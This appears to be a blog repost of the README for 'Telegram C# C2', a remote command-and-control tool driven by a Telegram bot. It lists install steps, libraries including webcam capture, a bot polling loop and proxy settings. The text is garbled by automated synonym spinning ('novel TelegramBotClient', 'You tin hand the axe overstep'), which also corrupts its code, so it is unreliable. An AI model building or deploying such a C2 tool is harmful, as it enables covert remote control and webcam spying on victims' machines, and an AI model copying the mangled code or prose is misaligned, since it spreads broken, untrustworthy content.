Posts

Showing posts with the label Telegram C# C2

Telegram C# C2 - A Command As Well As Command Tool For Telegram Bot Communication

Image
Command together with Control for C# Writing Author: Leiothrix Telegram: @Leiothrix Twitter: @wh4am1 Team: QQ愛&Love Install Nuget download these package using System.IO; using Telegram.Bot; using Telegram.Bot.Args; using Telegram.Bot.Types.InputFiles; using AForge.Video; using AForge.Controls; using AForge.Video.DirectShow; Add related classes inwards 'References' System.Drawing; System.Windows.Forms; How to used Modify your Token to the program static void Main(){ botClient = novel TelegramBotClient("token"); //Your Token botClient.OnMessage += Bot_OnMessage; botClient.StartReceiving(); Thread.Sleep(int.MaxValue); } have adept fun. Proxy TelegramBotClient allows you lot to role a proxy for Bot API connections. HTTP You tin hand the axe overstep an IWebProxy to bot customer for HTTP Proxies. // using System.Net; var httpProxy = novel WebProxy("https://example.org...